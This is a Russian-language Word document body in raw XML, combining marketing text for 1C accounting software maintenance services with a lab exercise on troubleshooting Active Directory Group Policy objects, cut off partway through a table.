      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Известно, что на сегодняшний день такие программные продукты как 1С Бухгалтерия 7.7, 1С Бухгалтерия 8, 1С Управление торговлей 8, 1С (УТ 8) Управление производственным предприятием 8 (УПП 8), 1С Зарплата и кадры (ЗИК), успешно внедрены и используются более чем на 1 миллионе предприятий по все России. В связи с этим на рынке ощущается острая нехватка по истине хороших специалистов, которые могут грамотно проконсультировать, настроить, обновить или адекватно проанализировать ту или иную нештатную ситуацию появившуюся в ходе эксплуатации любого программного обеспечения из ниже перечисленных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Бухгалтерия 7.7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Бухгалтерия 8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Управление торговлей 8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Управление торговлей 8 (УТ 8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Управление производственным предприятием 8 (УПП 8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1С Зарплата и кадры (ЗИК).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зачастую при использовании услуг 1С по обслуживанию и настройке 1С, которые предоставляют сторонние организации, вы наталкиваетесь на то что за огромные деньги к вам приезжают специалисты которые на поверку знают про настройку и обслуживание программных продуктов 1С , в лучшем случае столько же сколько и вы, а в худшем и того меньше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все вышеперечисленные проблемы связанные с эксплуатацией данных программных продуктов, позволяет нам предложить вам услугу обслуживание 1С, которая решит на вашем предприятие все проблемы связанные с обслуживанием 1С, дополнительной настройкой 1С и оперативных консультаций по 1С тех сотрудников вашего предприятия у которых возникает необходимость в этом. Данная услуга будет осуществляться специалистами нашей фирмы, которые прошли множество обучений по таким конфигурациям как 1С Бухгалтерия 7.7, 1С Бухгалтерия 8, 1С Управление торговлей 8, 1С (УТ 8) Управление производственным предприятием 8 (УПП 8), 1С Зарплата и кадры (ЗИК), и соответственно имеют многочисленные сертификаты подтверждающие их профессионализм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На ряду с разовыми выездами наших специалистов, мы предоставляем услугу 1С - абонентское обслуживание, которая заключается в следующем: Вы заключаете с нами договор на услугу абонентское обслуживание 1С, по одному из наших тарифов, которые приведены в разделе цены на наши услуги . Обычно в услугу 1С - абонентское обслуживание входит: обновление 1С, консультирование по 1С, обучение 1С, сопровождение 1С. Количество часов, которые потратит наш специалист на обслуживание 1С, на вашем предприятии варьируется от тарифа который вы выберите. С ценами на разовые услуги программиста 1С, вы можете ознакомиться здесь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В связи с постоянным изменением соответствия документов по имеющимся нормам законодательства в бухгалтерской отчетности, часто возникает потребность изменять вид тех или иных отчетов для сдачи в налоговую инспекцию. Для решения данного вопроса фирмой 1С выпускаются универсальное обновление 1С, в которых содержаться все последние дополнения и изменения касающиеся отчетности для налоговой инспекции. Что бы обновить имеющиеся базы 1С нужно, как минимум приобрести данное обновление 1С, и самостоятельно загрузить его в базу требующую обновление, сопоставить ее с данным обновлением и только после этого обновить. Естественно нужно понимать что для обновления 1С, по мимо наличия определенного опыта в отношении использования программного обеспечения на базе 1С Предприятие, вы еще потратите не мало времени на скачивание данного обновление 1С , или покупки его в офисе 1С.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="00A12BEF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc507788245"/>
      <w:bookmarkStart w:id="123" w:name="_Toc507788520"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2 </w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблем конфигурации с помощью групповых политик.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Цель: научиться </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разрешать проблем конфигурации с помощью групповых политик.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Служба каталогов Microsoft Active Directory стала одним из важнейших компонентов многих IT-сред. Одной из важнейших возможностей службы Active Directory является поддержка групповых политик, позволяющих администраторам централизовать управление контроллерами, серверами и рабочими станциями домена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование групповой политики предоставляет множество очевидных преимуществ, есть, однако, и один недостаток. В больших организациях она может быть сложна в разработке и реализации, не говоря уже о решении возможных проблем. В данной статье мы выясним, как организована групповая политика, и рассмотрим способы устранения связанных с ней неполадок. В результате вы будете готовы к решению почти любых проблем, связанных с групповой политикой.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок групповых политик – не самая легкая из возможных задач. На самом деле, как показано в данной статье, групповая политика является сложным предметом. Приступая к решению связанных с групповой политикой проблем, необходимо понимать общие принципы ее обработки и базовую архитектуру. Необходимо также иметь четкое представление о том, как обновляются, реплицируются, обрабатываются и применяются объекты групповой политики. Овладение всеми этими понятиями сильно облегчает устранение любой конкретной неполадки в групповой политике. Следуя приведенным в данной статье рекомендациям и правильно используя необходимые инструменты, вы будете готовы справиться с любыми проблемами групповой политики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="S2"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проблемные параметры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Групповые политики представляют собой сложный механизм с множеством составляющих, особенно в том, что касается способа их взаимодействия с общей идеей и реализацией службы Active Directory®. При поиске решения различных проблем, связанных с сетями и доступом, необходимо всегда учитывать службу Active Directory и основы реализации групповой политики. Чтобы начать процесс поиска решения, рассмотрим параметры групповой политики, при настройке которых могут быть допущены ошибки, а затем перейдем к более сложным проблемам, которые могут возникать в работе групповой политики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры групповой политики просматриваются администраторами Active Directory с помощью файлов административных шаблонов (файлы ADM или ADMX) и редактора объектов групповой политики GPEdit (запускается файлом gpedit.msc). С помощью GPEdit администратор создает файлы объектов групповой политики, или GPO. Объекты GPO настраиваются таким образом, чтобы применяться (или не применяться) к компьютерам и пользователям в структуре Active Directory. Для правильной работы объекты GPO должны соответствовать многим правилам. Рассмотрим их подробнее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объекты GPO должны быть связаны Вновь созданный объект GPO может быть не связан ни с одним узлом Active Directory. Такой объект GPO можно редактировать и изменять, но пока он не связан с каким-либо узлом, он не сможет влиять ни на один объект. Чтобы убедиться, что объект GPO должным образом связан, следует просмотреть окно информации в консоли управления групповой политикой (GPMC), показанное на рис. 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2414550" cy="1753488"/>
            <wp:effectExtent l="19050" t="0" r="4800" b="0"/>
            <wp:docPr id="269" name="Рисунок 99" descr="Рис. 1 Явно отображены связи объекта G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Рис. 1 Явно отображены связи объекта GPO"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2414931" cy="1753764"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 1 Явно отображены связи объекта GPO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Объект GPO должен применяться к объекту надлежащего типа Как известно, групповая политика должна применяться к объектам правильного типа в Active Directory. Однако в ходе процесса отладки этим иногда пренебрегают. Внутри объекта GPO существуют две основные категории: компьютер и пользователь. При настройке GPO обязательно отметьте, к какому типу объектов он применяется – к компьютеру или к пользователю. Таким образом можно будет проверить, правильного ли типа объекты помещены в подразделение, с которым связан объект GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объекты GPO неприменимы к группам Объект GPO не может применяться к объекту группы безопасности Active Directory. С помощью объекта GPO можно настраивать параметры только двух объектов – компьютеров и пользователей. Объекты GPO не могут воздействовать на объекты через принадлежность к группам. Например, если объект GPO связан с подразделением Финансы, как показано на рис. 2, он будет применен только к объектам Дерек и Франк. Параметры объекта GPO не будут применены к участникам группы Маркетинг, кто бы в нее не входил.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2133750" cy="1139612"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="270" name="Рисунок 100" descr="Рис. 2 Подразделение Финансы и находящиеся в нем объе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Рис. 2 Подразделение Финансы и находящиеся в нем объекты"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId254" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2139212" cy="1142529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 2 Подразделение Финансы и находящиеся в нем объекты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объекты, к которым применяется GPO, должны находится в пределах области управления Если параметр объекта GPO не производит должного воздействия на объект, существует еще более важный параметр – объект должен находиться в пределах области управления объекта GPO. Это означает, что данный объект должен находиться ниже узла, к которым связан объект GPO (достаточно дочернего узла). Например, объект GPO, связанный с подразделением Финансы, не будет применен ни к одному из объектов подразделения Маркетинг, как показано на рис. 2. Область управления объекта GPO простирается от узла, с которым он связан, далее вниз по структуре службы Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2176950" cy="1162686"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="271" name="Рисунок 101" descr="Рис. 3 Для подразделений, расположенных на одном уровне, объект GPO применяется только к подразделению, с которым он связ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Рис. 3 Для подразделений, расположенных на одном уровне, объект GPO применяется только к подразделению, с которым он связан."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2180246" cy="1164446"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 3 Для подразделений, расположенных на одном уровне, объект GPO применяется только к подразделению, с которым он связан.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объекты GPO должны быть включены При создании объекта GPO он не настроен на внесение каких-либо изменений в целевые объекты. Однако он включен как для компьютеров, так и для пользователей. Если одна из этих настроек отключена, это может быть очень сложно отследить. Поэтому при отладке ошибок применения объекта GPO неплохо проверить, не отключены ли некоторые или даже все объекты GPO. Это можно сделать в разделе Объекты групповой политики | Политика учетных записей в консоли GPMC, проверив состояние GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Некоторые параметры требуют перезагрузки. Если параметр GPO работает неправильно, причиной может быть механизм обработки GPO. При периодическом фоновом обновлении объектов GPO могут быть обработаны не все параметры GPO, а лишь некоторые из них. Поэтому уже созданный параметр может еще не действовать. Некоторые параметры относятся к категории политик переднего плана и применяются только при перезагрузке компьютера или выходе пользователя из системы и повторном входе. Примерами параметров, которым свойственно такое поведение, могут быть установка программного обеспечения, перенаправление папки и приложение сценария.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="S9"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Синхронное и асинхронное применение параметров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В объекте GPO можно задать способ применения политики при загрузке и входе в систему. Внесенные изменения либо предоставят немедленный доступ к рабочему столу до полного применения всех политик, либо обеспечат применение всех политик до того, как пользователь получит доступ к рабочему столу. На рис. 4 показано поведение каждой операционной системы по умолчанию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="fig4"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обработка по умолчанию на клиенте</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2470"/>
        <w:gridCol w:w="1607"/>
        <w:gridCol w:w="2461"/>
        <w:gridCol w:w="2462"/>
      </w:tblGrid>
      <w:tr w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidTr="00A12BEF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Операционная система</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1607" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Загрузка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вход в систему</w:t>
            </w:r>
          </w:p>
        </w:tc>
